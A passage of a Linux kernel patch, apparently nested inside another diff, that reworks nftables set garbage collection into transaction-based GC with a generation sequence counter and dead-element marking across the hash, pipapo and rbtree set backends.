+@@ -6047,7 +6071,8 @@ struct nft_set_ext *nft_set_catchall_lookup(const struct net *net,
+ 	list_for_each_entry_rcu(catchall, &set->catchall_list, list) {
+ 		ext = nft_set_elem_ext(set, catchall->elem);
+ 		if (nft_set_elem_active(ext, genmask) &&
+-		    !nft_set_elem_expired(ext))
++		    !nft_set_elem_expired(ext) &&
++		    !nft_set_elem_is_dead(ext))
+ 			return ext;
+ 	}
+ 
+@@ -6055,29 +6080,6 @@ struct nft_set_ext *nft_set_catchall_lookup(const struct net *net,
+ }
+ EXPORT_SYMBOL_GPL(nft_set_catchall_lookup);
+ 
+-void *nft_set_catchall_gc(const struct nft_set *set)
+-{
+-	struct nft_set_elem_catchall *catchall, *next;
+-	struct nft_set_ext *ext;
+-	void *elem = NULL;
+-
+-	list_for_each_entry_safe(catchall, next, &set->catchall_list, list) {
+-		ext = nft_set_elem_ext(set, catchall->elem);
+-
+-		if (!nft_set_elem_expired(ext) ||
+-		    nft_set_elem_mark_busy(ext))
+-			continue;
+-
+-		elem = catchall->elem;
+-		list_del_rcu(&catchall->list);
+-		kfree_rcu(catchall, rcu);
+-		break;
+-	}
+-
+-	return elem;
+-}
+-EXPORT_SYMBOL_GPL(nft_set_catchall_gc);
+-
+ static int nft_setelem_catchall_insert(const struct net *net,
+ 				       struct nft_set *set,
+ 				       const struct nft_set_elem *elem,
+@@ -6139,7 +6141,6 @@ static void nft_setelem_activate(struct net *net, struct nft_set *set,
+ 
+ 	if (nft_setelem_is_catchall(set, elem)) {
+ 		nft_set_elem_change_active(net, set, ext);
+-		nft_set_elem_clear_busy(ext);
+ 	} else {
+ 		set->ops->activate(net, set, elem);
+ 	}
+@@ -6154,8 +6155,7 @@ static int nft_setelem_catchall_deactivate(const struct net *net,
+ 
+ 	list_for_each_entry(catchall, &set->catchall_list, list) {
+ 		ext = nft_set_elem_ext(set, catchall->elem);
+-		if (!nft_is_active(net, ext) ||
+-		    nft_set_elem_mark_busy(ext))
++		if (!nft_is_active(net, ext))
+ 			continue;
+ 
+ 		kfree(elem->priv);
+@@ -6550,7 +6550,7 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 		goto err_elem_free;
+ 	}
+ 
+-	ext->genmask = nft_genmask_cur(ctx->net) | NFT_SET_ELEM_BUSY_MASK;
++	ext->genmask = nft_genmask_cur(ctx->net);
+ 
+ 	err = nft_setelem_insert(ctx->net, set, &elem, &ext2, flags);
+ 	if (err) {
+@@ -6700,9 +6700,9 @@ static void nft_setelem_data_activate(const struct net *net,
+ 		nft_use_inc_restore(&(*nft_set_ext_obj(ext))->use);
+ }
+ 
+-static void nft_setelem_data_deactivate(const struct net *net,
+-					const struct nft_set *set,
+-					struct nft_set_elem *elem)
++void nft_setelem_data_deactivate(const struct net *net,
++				 const struct nft_set *set,
++				 struct nft_set_elem *elem)
+ {
+ 	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
+ 
+@@ -6866,8 +6866,7 @@ static int nft_set_catchall_flush(const struct nft_ctx *ctx,
+ 
+ 	list_for_each_entry_rcu(catchall, &set->catchall_list, list) {
+ 		ext = nft_set_elem_ext(set, catchall->elem);
+-		if (!nft_set_elem_active(ext, genmask) ||
+-		    nft_set_elem_mark_busy(ext))
++		if (!nft_set_elem_active(ext, genmask))
+ 			continue;
+ 
+ 		elem.priv = catchall->elem;
+@@ -6919,8 +6918,10 @@ static int nf_tables_delsetelem(struct sk_buff *skb,
+ 	if (IS_ERR(set))
+ 		return PTR_ERR(set);
+ 
+-	if (!list_empty(&set->bindings) &&
+-	    (set->flags & (NFT_SET_CONSTANT | NFT_SET_ANONYMOUS)))
++	if (nft_set_is_anonymous(set))
++		return -EOPNOTSUPP;
++
++	if (!list_empty(&set->bindings) && (set->flags & NFT_SET_CONSTANT))
+ 		return -EBUSY;
+ 
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+@@ -6938,29 +6939,6 @@ static int nf_tables_delsetelem(struct sk_buff *skb,
+ 	return err;
+ }
+ 
+-void nft_set_gc_batch_release(struct rcu_head *rcu)
+-{
+-	struct nft_set_gc_batch *gcb;
+-	unsigned int i;
+-
+-	gcb = container_of(rcu, struct nft_set_gc_batch, head.rcu);
+-	for (i = 0; i < gcb->head.cnt; i++)
+-		nft_set_elem_destroy(gcb->head.set, gcb->elems[i], true);
+-	kfree(gcb);
+-}
+-
+-struct nft_set_gc_batch *nft_set_gc_batch_alloc(const struct nft_set *set,
+-						gfp_t gfp)
+-{
+-	struct nft_set_gc_batch *gcb;
+-
+-	gcb = kzalloc(sizeof(*gcb), gfp);
+-	if (gcb == NULL)
+-		return gcb;
+-	gcb->head.set = set;
+-	return gcb;
+-}
+-
+ /*
+  * Stateful objects
+  */
+@@ -9089,6 +9067,234 @@ void nft_chain_del(struct nft_chain *chain)
+ 	list_del_rcu(&chain->list);
+ }
+ 
++static void nft_trans_gc_setelem_remove(struct nft_ctx *ctx,
++					struct nft_trans_gc *trans)
++{
++	void **priv = trans->priv;
++	unsigned int i;
++
++	for (i = 0; i < trans->count; i++) {
++		struct nft_set_elem elem = {
++			.priv = priv[i],
++		};
++
++		nft_setelem_data_deactivate(ctx->net, trans->set, &elem);
++		nft_setelem_remove(ctx->net, trans->set, &elem);
++	}
++}
++
++void nft_trans_gc_destroy(struct nft_trans_gc *trans)
++{
++	nft_set_put(trans->set);
++	put_net(trans->net);
++	kfree(trans);
++}
++
++static void nft_trans_gc_trans_free(struct rcu_head *rcu)
++{
++	struct nft_set_elem elem = {};
++	struct nft_trans_gc *trans;
++	struct nft_ctx ctx = {};
++	unsigned int i;
++
++	trans = container_of(rcu, struct nft_trans_gc, rcu);
++	ctx.net	= read_pnet(&trans->set->net);
++
++	for (i = 0; i < trans->count; i++) {
++		elem.priv = trans->priv[i];
++		if (!nft_setelem_is_catchall(trans->set, &elem))
++			atomic_dec(&trans->set->nelems);
++
++		nf_tables_set_elem_destroy(&ctx, trans->set, elem.priv);
++	}
++
++	nft_trans_gc_destroy(trans);
++}
++
++static bool nft_trans_gc_work_done(struct nft_trans_gc *trans)
++{
++	struct nftables_pernet *nft_net;
++	struct nft_ctx ctx = {};
++
++	nft_net = nft_pernet(trans->net);
++
++	mutex_lock(&nft_net->commit_mutex);
++
++	/* Check for race with transaction, otherwise this batch refers to
++	 * stale objects that might not be there anymore. Skip transaction if
++	 * set has been destroyed from control plane transaction in case gc
++	 * worker loses race.
++	 */
++	if (READ_ONCE(nft_net->gc_seq) != trans->seq || trans->set->dead) {
++		mutex_unlock(&nft_net->commit_mutex);
++		return false;
++	}
++
++	ctx.net = trans->net;
++	ctx.table = trans->set->table;
++
++	nft_trans_gc_setelem_remove(&ctx, trans);
++	mutex_unlock(&nft_net->commit_mutex);
++
++	return true;
++}
++
++static void nft_trans_gc_work(struct work_struct *work)
++{
++	struct nft_trans_gc *trans, *next;
++	LIST_HEAD(trans_gc_list);
++
++	spin_lock(&nf_tables_gc_list_lock);
++	list_splice_init(&nf_tables_gc_list, &trans_gc_list);
++	spin_unlock(&nf_tables_gc_list_lock);
++
++	list_for_each_entry_safe(trans, next, &trans_gc_list, list) {
++		list_del(&trans->list);
++		if (!nft_trans_gc_work_done(trans)) {
++			nft_trans_gc_destroy(trans);
++			continue;
++		}
++		call_rcu(&trans->rcu, nft_trans_gc_trans_free);
++	}
++}
++
++struct nft_trans_gc *nft_trans_gc_alloc(struct nft_set *set,
++					unsigned int gc_seq, gfp_t gfp)
++{
++	struct net *net = read_pnet(&set->net);
++	struct nft_trans_gc *trans;
++
++	trans = kzalloc(sizeof(*trans), gfp);
++	if (!trans)
++		return NULL;
++
++	trans->net = maybe_get_net(net);
++	if (!trans->net) {
++		kfree(trans);
++		return NULL;
++	}
++
++	refcount_inc(&set->refs);
++	trans->set = set;
++	trans->seq = gc_seq;
++
++	return trans;
++}
++
++void nft_trans_gc_elem_add(struct nft_trans_gc *trans, void *priv)
++{
++	trans->priv[trans->count++] = priv;
++}
++
++static void nft_trans_gc_queue_work(struct nft_trans_gc *trans)
++{
++	spin_lock(&nf_tables_gc_list_lock);
++	list_add_tail(&trans->list, &nf_tables_gc_list);
++	spin_unlock(&nf_tables_gc_list_lock);
++
++	schedule_work(&trans_gc_work);
++}
++
++static int nft_trans_gc_space(struct nft_trans_gc *trans)
++{
++	return NFT_TRANS_GC_BATCHCOUNT - trans->count;
++}
++
++struct nft_trans_gc *nft_trans_gc_queue_async(struct nft_trans_gc *gc,
++					      unsigned int gc_seq, gfp_t gfp)
++{
++	struct nft_set *set;
++
++	if (nft_trans_gc_space(gc))
++		return gc;
++
++	set = gc->set;
++	nft_trans_gc_queue_work(gc);
++
++	return nft_trans_gc_alloc(set, gc_seq, gfp);
++}
++
++void nft_trans_gc_queue_async_done(struct nft_trans_gc *trans)
++{
++	if (trans->count == 0) {
++		nft_trans_gc_destroy(trans);
++		return;
++	}
++
++	nft_trans_gc_queue_work(trans);
++}
++
++struct nft_trans_gc *nft_trans_gc_queue_sync(struct nft_trans_gc *gc, gfp_t gfp)
++{
++	struct nft_set *set;
++
++	if (WARN_ON_ONCE(!lockdep_commit_lock_is_held(gc->net)))
++		return NULL;
++
++	if (nft_trans_gc_space(gc))
++		return gc;
++
++	set = gc->set;
++	call_rcu(&gc->rcu, nft_trans_gc_trans_free);
++
++	return nft_trans_gc_alloc(set, 0, gfp);
++}
++
++void nft_trans_gc_queue_sync_done(struct nft_trans_gc *trans)
++{
++	WARN_ON_ONCE(!lockdep_commit_lock_is_held(trans->net));
++
++	if (trans->count == 0) {
++		nft_trans_gc_destroy(trans);
++		return;
++	}
++
++	call_rcu(&trans->rcu, nft_trans_gc_trans_free);
++}
++
++static struct nft_trans_gc *nft_trans_gc_catchall(struct nft_trans_gc *gc,
++						  unsigned int gc_seq,
++						  bool sync)
++{
++	struct nft_set_elem_catchall *catchall;
++	const struct nft_set *set = gc->set;
++	struct nft_set_ext *ext;
++
++	list_for_each_entry_rcu(catchall, &set->catchall_list, list) {
++		ext = nft_set_elem_ext(set, catchall->elem);
++
++		if (!nft_set_elem_expired(ext))
++			continue;
++		if (nft_set_elem_is_dead(ext))
++			goto dead_elem;
++
++		nft_set_elem_dead(ext);
++dead_elem:
++		if (sync)
++			gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
++		else
++			gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
++
++		if (!gc)
++			return NULL;
++
++		nft_trans_gc_elem_add(gc, catchall->elem);
++	}
++
++	return gc;
++}
++
++struct nft_trans_gc *nft_trans_gc_catchall_async(struct nft_trans_gc *gc,
++						 unsigned int gc_seq)
++{
++	return nft_trans_gc_catchall(gc, gc_seq, false);
++}
++
++struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc)
++{
++	return nft_trans_gc_catchall(gc, 0, true);
++}
++
+ static void nf_tables_module_autoload_cleanup(struct net *net)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+@@ -9247,15 +9453,31 @@ static void nft_set_commit_update(struct list_head *set_update_list)
+ 	}
+ }
+ 
++static unsigned int nft_gc_seq_begin(struct nftables_pernet *nft_net)
++{
++	unsigned int gc_seq;
++
++	/* Bump gc counter, it becomes odd, this is the busy mark. */
++	gc_seq = READ_ONCE(nft_net->gc_seq);
++	WRITE_ONCE(nft_net->gc_seq, ++gc_seq);
++
++	return gc_seq;
++}
++
++static void nft_gc_seq_end(struct nftables_pernet *nft_net, unsigned int gc_seq)
++{
++	WRITE_ONCE(nft_net->gc_seq, ++gc_seq);
++}
++
+ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+ 	struct nft_trans *trans, *next;
++	unsigned int base_seq, gc_seq;
+ 	LIST_HEAD(set_update_list);
+ 	struct nft_trans_elem *te;
+ 	struct nft_chain *chain;
+ 	struct nft_table *table;
+-	unsigned int base_seq;
+ 	LIST_HEAD(adl);
+ 	int err;
+ 
+@@ -9332,6 +9554,8 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 
+ 	WRITE_ONCE(nft_net->base_seq, base_seq);
+ 
++	gc_seq = nft_gc_seq_begin(nft_net);
++
+ 	/* step 3. Start new generation, rules_gen_X now in use. */
+ 	net->nft.gencursor = nft_gencursor_next(net);
+ 
+@@ -9420,6 +9644,7 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 			nft_trans_destroy(trans);
+ 			break;
+ 		case NFT_MSG_DELSET:
++			nft_trans_set(trans)->dead = 1;
+ 			list_del_rcu(&nft_trans_set(trans)->list);
+ 			nf_tables_set_notify(&trans->ctx, nft_trans_set(trans),
+ 					     NFT_MSG_DELSET, GFP_KERNEL);
+@@ -9519,6 +9744,8 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 	nft_commit_notify(net, NETLINK_CB(skb).portid);
+ 	nf_tables_gen_notify(net, skb, NFT_MSG_NEWGEN);
+ 	nf_tables_commit_audit_log(&adl, nft_net->base_seq);
++
++	nft_gc_seq_end(nft_net, gc_seq);
+ 	nf_tables_commit_release(net);
+ 
+ 	return 0;
+@@ -9777,7 +10004,12 @@ static int nf_tables_abort(struct net *net, struct sk_buff *skb,
+ 			   enum nfnl_abort_action action)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+-	int ret = __nf_tables_abort(net, action);
++	unsigned int gc_seq;
++	int ret;
++
++	gc_seq = nft_gc_seq_begin(nft_net);
++	ret = __nf_tables_abort(net, action);
++	nft_gc_seq_end(nft_net, gc_seq);
+ 
+ 	mutex_unlock(&nft_net->commit_mutex);
+ 
+@@ -10440,7 +10672,7 @@ static void __nft_release_table(struct net *net, struct nft_table *table)
+ 	ctx.family = table->family;
+ 	ctx.table = table;
+ 	list_for_each_entry(chain, &table->chains, list) {
+-		if (nft_chain_is_bound(chain))
++		if (nft_chain_binding(chain))
+ 			continue;
+ 
+ 		ctx.chain = chain;
+@@ -10501,6 +10733,7 @@ static int nft_rcv_nl_event(struct notifier_block *this, unsigned long event,
+ 	struct net *net = n->net;
+ 	unsigned int deleted;
+ 	bool restart = false;
++	unsigned int gc_seq;
+ 
+ 	if (event != NETLINK_URELEASE || n->protocol != NETLINK_NETFILTER)
+ 		return NOTIFY_DONE;
+@@ -10508,6 +10741,9 @@ static int nft_rcv_nl_event(struct notifier_block *this, unsigned long event,
+ 	nft_net = nft_pernet(net);
+ 	deleted = 0;
+ 	mutex_lock(&nft_net->commit_mutex);
++
++	gc_seq = nft_gc_seq_begin(nft_net);
++
+ 	if (!list_empty(&nf_tables_destroy_list))
+ 		nf_tables_trans_destroy_flush_work();
+ again:
+@@ -10530,6 +10766,8 @@ again:
+ 		if (restart)
+ 			goto again;
+ 	}
++	nft_gc_seq_end(nft_net, gc_seq);
++
+ 	mutex_unlock(&nft_net->commit_mutex);
+ 
+ 	return NOTIFY_DONE;
+@@ -10551,6 +10789,7 @@ static int __net_init nf_tables_init_net(struct net *net)
+ 	mutex_init(&nft_net->commit_mutex);
+ 	nft_net->base_seq = 1;
+ 	nft_net->validate_state = NFT_VALIDATE_SKIP;
++	nft_net->gc_seq = 0;
+ 
+ 	return 0;
+ }
+@@ -10567,22 +10806,36 @@ static void __net_exit nf_tables_pre_exit_net(struct net *net)
+ static void __net_exit nf_tables_exit_net(struct net *net)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
++	unsigned int gc_seq;
+ 
+ 	mutex_lock(&nft_net->commit_mutex);
++
++	gc_seq = nft_gc_seq_begin(nft_net);
++
+ 	if (!list_empty(&nft_net->commit_list) ||
+ 	    !list_empty(&nft_net->module_list))
+ 		__nf_tables_abort(net, NFNL_ABORT_NONE);
++
+ 	__nft_release_tables(net);
++
++	nft_gc_seq_end(nft_net, gc_seq);
++
+ 	mutex_unlock(&nft_net->commit_mutex);
+ 	WARN_ON_ONCE(!list_empty(&nft_net->tables));
+ 	WARN_ON_ONCE(!list_empty(&nft_net->module_list));
+ 	WARN_ON_ONCE(!list_empty(&nft_net->notify_list));
+ }
+ 
++static void nf_tables_exit_batch(struct list_head *net_exit_list)
++{
++	flush_work(&trans_gc_work);
++}
++
+ static struct pernet_operations nf_tables_net_ops = {
+ 	.init		= nf_tables_init_net,
+ 	.pre_exit	= nf_tables_pre_exit_net,
+ 	.exit		= nf_tables_exit_net,
++	.exit_batch	= nf_tables_exit_batch,
+ 	.id		= &nf_tables_net_id,
+ 	.size		= sizeof(struct nftables_pernet),
+ };
+@@ -10654,6 +10907,7 @@ static void __exit nf_tables_module_exit(void)
+ 	nft_chain_filter_fini();
+ 	nft_chain_route_fini();
+ 	unregister_pernet_subsys(&nf_tables_net_ops);
++	cancel_work_sync(&trans_gc_work);
+ 	cancel_work_sync(&trans_destroy_work);
+ 	rcu_barrier();
+ 	rhltable_destroy(&nft_objname_ht);
+diff --git a/net/netfilter/nft_set_hash.c b/net/netfilter/nft_set_hash.c
+index 0b73cb0e752f7..2013de934cef0 100644
+--- a/net/netfilter/nft_set_hash.c
++++ b/net/netfilter/nft_set_hash.c
+@@ -59,6 +59,8 @@ static inline int nft_rhash_cmp(struct rhashtable_compare_arg *arg,
+ 
+ 	if (memcmp(nft_set_ext_key(&he->ext), x->key, x->set->klen))
+ 		return 1;
++	if (nft_set_elem_is_dead(&he->ext))
++		return 1;
+ 	if (nft_set_elem_expired(&he->ext))
+ 		return 1;
+ 	if (!nft_set_elem_active(&he->ext, x->genmask))
+@@ -188,7 +190,6 @@ static void nft_rhash_activate(const struct net *net, const struct nft_set *set,
+ 	struct nft_rhash_elem *he = elem->priv;
+ 
+ 	nft_set_elem_change_active(net, set, &he->ext);
+-	nft_set_elem_clear_busy(&he->ext);
+ }
+ 
+ static bool nft_rhash_flush(const struct net *net,
+@@ -196,12 +197,9 @@ static bool nft_rhash_flush(const struct net *net,
+ {
+ 	struct nft_rhash_elem *he = priv;
+ 
+-	if (!nft_set_elem_mark_busy(&he->ext) ||
+-	    !nft_is_active(net, &he->ext)) {
+-		nft_set_elem_change_active(net, set, &he->ext);
+-		return true;
+-	}
+-	return false;
++	nft_set_elem_change_active(net, set, &he->ext);
++
++	return true;
+ }
+ 
+ static void *nft_rhash_deactivate(const struct net *net,
+@@ -218,9 +216,8 @@ static void *nft_rhash_deactivate(const struct net *net,
+ 
+ 	rcu_read_lock();
+ 	he = rhashtable_lookup(&priv->ht, &arg, nft_rhash_params);
+-	if (he != NULL &&
+-	    !nft_rhash_flush(net, set, he))
+-		he = NULL;
++	if (he)
++		nft_set_elem_change_active(net, set, &he->ext);
+ 
+ 	rcu_read_unlock();
+ 
+@@ -252,7 +249,9 @@ static bool nft_rhash_delete(const struct nft_set *set,
+ 	if (he == NULL)
+ 		return false;
+ 
+-	return rhashtable_remove_fast(&priv->ht, &he->node, nft_rhash_params) == 0;
++	nft_set_elem_dead(&he->ext);
++
++	return true;
+ }
+ 
+ static void nft_rhash_walk(const struct nft_ctx *ctx, struct nft_set *set,
+@@ -278,8 +277,6 @@ static void nft_rhash_walk(const struct nft_ctx *ctx, struct nft_set *set,
+ 
+ 		if (iter->count < iter->skip)
+ 			goto cont;
+-		if (nft_set_elem_expired(&he->ext))
+-			goto cont;
+ 		if (!nft_set_elem_active(&he->ext, iter->genmask))
+ 			goto cont;
+ 
+@@ -314,25 +311,48 @@ static bool nft_rhash_expr_needs_gc_run(const struct nft_set *set,
+ 
+ static void nft_rhash_gc(struct work_struct *work)
+ {
++	struct nftables_pernet *nft_net;
+ 	struct nft_set *set;
+ 	struct nft_rhash_elem *he;
+ 	struct nft_rhash *priv;
+-	struct nft_set_gc_batch *gcb = NULL;
+ 	struct rhashtable_iter hti;
++	struct nft_trans_gc *gc;
++	struct net *net;
++	u32 gc_seq;
+ 
+ 	priv = container_of(work, struct nft_rhash, gc_work.work);
+ 	set  = nft_set_container_of(priv);
++	net  = read_pnet(&set->net);
++	nft_net = nft_pernet(net);
++	gc_seq = READ_ONCE(nft_net->gc_seq);
++
++	if (nft_set_gc_is_pending(set))
++		goto done;
++
++	gc = nft_trans_gc_alloc(set, gc_seq, GFP_KERNEL);
++	if (!gc)
++		goto done;
+ 
+ 	rhashtable_walk_enter(&priv->ht, &hti);
+ 	rhashtable_walk_start(&hti);
+ 
+ 	while ((he = rhashtable_walk_next(&hti))) {
+ 		if (IS_ERR(he)) {
+-			if (PTR_ERR(he) != -EAGAIN)
+-				break;
+-			continue;
++			nft_trans_gc_destroy(gc);
++			gc = NULL;
++			goto try_later;
++		}
++
++		/* Ruleset has been updated, try later. */
++		if (READ_ONCE(nft_net->gc_seq) != gc_seq) {
++			nft_trans_gc_destroy(gc);
++			gc = NULL;
++			goto try_later;
+ 		}
+ 
++		if (nft_set_elem_is_dead(&he->ext))
++			goto dead_elem;
++
+ 		if (nft_set_ext_exists(&he->ext, NFT_SET_EXT_EXPRESSIONS) &&
+ 		    nft_rhash_expr_needs_gc_run(set, &he->ext))
+ 			goto needs_gc_run;
+@@ -340,26 +360,26 @@ static void nft_rhash_gc(struct work_struct *work)
+ 		if (!nft_set_elem_expired(&he->ext))
+ 			continue;
+ needs_gc_run:
+-		if (nft_set_elem_mark_busy(&he->ext))
+-			continue;
++		nft_set_elem_dead(&he->ext);
++dead_elem:
++		gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
++		if (!gc)
++			goto try_later;
+ 
+-		gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC);
+-		if (gcb == NULL)
+-			break;
+-		rhashtable_remove_fast(&priv->ht, &he->node, nft_rhash_params);
+-		atomic_dec(&set->nelems);
+-		nft_set_gc_batch_add(gcb, he);
++		nft_trans_gc_elem_add(gc, he);
+ 	}
++
++	gc = nft_trans_gc_catchall_async(gc, gc_seq);
++
++try_later:
++	/* catchall list iteration requires rcu read side lock. */
+ 	rhashtable_walk_stop(&hti);
+ 	rhashtable_walk_exit(&hti);
+ 
+-	he = nft_set_catchall_gc(set);
+-	if (he) {
+-		gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC);
+-		if (gcb)
+-			nft_set_gc_batch_add(gcb, he);
+-	}
+-	nft_set_gc_batch_complete(gcb);
++	if (gc)
++		nft_trans_gc_queue_async_done(gc);
++
++done:
+ 	queue_delayed_work(system_power_efficient_wq, &priv->gc_work,
+ 			   nft_set_gc_interval(set));
+ }
+@@ -394,7 +414,7 @@ static int nft_rhash_init(const struct nft_set *set,
+ 		return err;
+ 
+ 	INIT_DEFERRABLE_WORK(&priv->gc_work, nft_rhash_gc);
+-	if (set->flags & NFT_SET_TIMEOUT)
++	if (set->flags & (NFT_SET_TIMEOUT | NFT_SET_EVAL))
+ 		nft_rhash_gc_init(set);
+ 
+ 	return 0;
+@@ -422,7 +442,6 @@ static void nft_rhash_destroy(const struct nft_ctx *ctx,
+ 	};
+ 
+ 	cancel_delayed_work_sync(&priv->gc_work);
+-	rcu_barrier();
+ 	rhashtable_free_and_destroy(&priv->ht, nft_rhash_elem_destroy,
+ 				    (void *)&rhash_ctx);
+ }
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 8c16681884b7e..deea6196d9925 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -566,8 +566,9 @@ next_match:
+ 			goto out;
+ 
+ 		if (last) {
+-			if (nft_set_elem_expired(&f->mt[b].e->ext) ||
+-			    (genmask &&
++			if (nft_set_elem_expired(&f->mt[b].e->ext))
++				goto next_match;
++			if ((genmask &&
+ 			     !nft_set_elem_active(&f->mt[b].e->ext, genmask)))
+ 				goto next_match;
+ 
+@@ -602,7 +603,7 @@ static void *nft_pipapo_get(const struct net *net, const struct nft_set *set,
+ 			    const struct nft_set_elem *elem, unsigned int flags)
+ {
+ 	return pipapo_get(net, set, (const u8 *)elem->key.val.data,
+-			  nft_genmask_cur(net));
++			 nft_genmask_cur(net));
+ }
+ 
+ /**
+@@ -1536,16 +1537,34 @@ static void pipapo_drop(struct nft_pipapo_match *m,
+ 	}
+ }
+ 
++static void nft_pipapo_gc_deactivate(struct net *net, struct nft_set *set,
++				     struct nft_pipapo_elem *e)
++
++{
++	struct nft_set_elem elem = {
++		.priv	= e,
++	};
++
++	nft_setelem_data_deactivate(net, set, &elem);
++}
++
+ /**
+  * pipapo_gc() - Drop expired entries from set, destroy start and end elements
+- * @set:	nftables API set representation
++ * @_set:	nftables API set representation
+  * @m:		Matching data
+  */
+-static void pipapo_gc(const struct nft_set *set, struct nft_pipapo_match *m)
++static void pipapo_gc(const struct nft_set *_set, struct nft_pipapo_match *m)
+ {
++	struct nft_set *set = (struct nft_set *) _set;
+ 	struct nft_pipapo *priv = nft_set_priv(set);
++	struct net *net = read_pnet(&set->net);
+ 	int rules_f0, first_rule = 0;
+ 	struct nft_pipapo_elem *e;
++	struct nft_trans_gc *gc;
++
++	gc = nft_trans_gc_alloc(set, 0, GFP_KERNEL);
++	if (!gc)
++		return;
+ 
+ 	while ((rules_f0 = pipapo_rules_same_key(m->f, first_rule))) {
+ 		union nft_pipapo_map_bucket rulemap[NFT_PIPAPO_MAX_FIELDS];
+@@ -1569,13 +1588,20 @@ static void pipapo_gc(const struct nft_set *set, struct nft_pipapo_match *m)
+ 		f--;
+ 		i--;
+ 		e = f->mt[rulemap[i].to].e;
+-		if (nft_set_elem_expired(&e->ext) &&
+-		    !nft_set_elem_mark_busy(&e->ext)) {
++
++		/* synchronous gc never fails, there is no need to set on
++		 * NFT_SET_ELEM_DEAD_BIT.
++		 */
++		if (nft_set_elem_expired(&e->ext)) {
+ 			priv->dirty = true;
+-			pipapo_drop(m, rulemap);
+ 
+-			rcu_barrier();
+-			nft_set_elem_destroy(set, e, true);
++			gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
++			if (!gc)
++				return;
++
++			nft_pipapo_gc_deactivate(net, set, e);
++			pipapo_drop(m, rulemap);
++			nft_trans_gc_elem_add(gc, e);
+ 
+ 			/* And check again current first rule, which is now the
+ 			 * first we haven't checked.
+@@ -1585,11 +1611,11 @@ static void pipapo_gc(const struct nft_set *set, struct nft_pipapo_match *m)
+ 		}
+ 	}
+ 
+-	e = nft_set_catchall_gc(set);
+-	if (e)
+-		nft_set_elem_destroy(set, e, true);
+-
+-	priv->last_gc = jiffies;
++	gc = nft_trans_gc_catchall_sync(gc);
++	if (gc) {
++		nft_trans_gc_queue_sync_done(gc);
++		priv->last_gc = jiffies;
++	}
+ }
+ 
+ /**
+@@ -1718,14 +1744,9 @@ static void nft_pipapo_activate(const struct net *net,
+ 				const struct nft_set *set,
+ 				const struct nft_set_elem *elem)
+ {
+-	struct nft_pipapo_elem *e;
+-
+-	e = pipapo_get(net, set, (const u8 *)elem->key.val.data, 0);
+-	if (IS_ERR(e))
+-		return;
++	struct nft_pipapo_elem *e = elem->priv;
+ 
+ 	nft_set_elem_change_active(net, set, &e->ext);
+-	nft_set_elem_clear_busy(&e->ext);
+ }
+ 
+ /**
+@@ -1937,10 +1958,6 @@ static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
+ 
+ 	data = (const u8 *)nft_set_ext_key(&e->ext);
+ 
+-	e = pipapo_get(net, set, data, 0);
+-	if (IS_ERR(e))
+-		return;
+-
+ 	while ((rules_f0 = pipapo_rules_same_key(m->f, first_rule))) {
+ 		union nft_pipapo_map_bucket rulemap[NFT_PIPAPO_MAX_FIELDS];
+ 		const u8 *match_start, *match_end;
+@@ -2024,8 +2041,6 @@ static void nft_pipapo_walk(const struct nft_ctx *ctx, struct nft_set *set,
+ 			goto cont;
+ 
+ 		e = f->mt[r].e;
+-		if (nft_set_elem_expired(&e->ext))
+-			goto cont;
+ 
+ 		elem.priv = e;
+ 
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 8d73fffd2d09d..487572dcd6144 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -46,6 +46,12 @@ static int nft_rbtree_cmp(const struct nft_set *set,
+ 		      set->klen);
+ }
+ 
++static bool nft_rbtree_elem_expired(const struct nft_rbtree_elem *rbe)
++{
++	return nft_set_elem_expired(&rbe->ext) ||
++	       nft_set_elem_is_dead(&rbe->ext);
++}
++
+ static bool __nft_rbtree_lookup(const struct net *net, const struct nft_set *set,
+ 				const u32 *key, const struct nft_set_ext **ext,
+ 				unsigned int seq)
+@@ -80,7 +86,7 @@ static bool __nft_rbtree_lookup(const struct net *net, const struct nft_set *set
+ 				continue;
+ 			}
+ 
+-			if (nft_set_elem_expired(&rbe->ext))
++			if (nft_rbtree_elem_expired(rbe))
+ 				return false;
+ 
+ 			if (nft_rbtree_interval_end(rbe)) {
+@@ -98,7 +104,7 @@ static bool __nft_rbtree_lookup(const struct net *net, const struct nft_set *set
+ 
+ 	if (set->flags & NFT_SET_INTERVAL && interval != NULL &&
+ 	    nft_set_elem_active(&interval->ext, genmask) &&
+-	    !nft_set_elem_expired(&interval->ext) &&
++	    !nft_rbtree_elem_expired(interval) &&
+ 	    nft_rbtree_interval_start(interval)) {
+ 		*ext = &interval->ext;
+ 		return true;
+@@ -215,6 +221,18 @@ static void *nft_rbtree_get(const struct net *net, const struct nft_set *set,
+ 	return rbe;
+ }
+ 
++static void nft_rbtree_gc_remove(struct net *net, struct nft_set *set,
++				 struct nft_rbtree *priv,
++				 struct nft_rbtree_elem *rbe)
++{
++	struct nft_set_elem elem = {
++		.priv	= rbe,
++	};
++
++	nft_setelem_data_deactivate(net, set, &elem);
++	rb_erase(&rbe->node, &priv->root);
++}
++
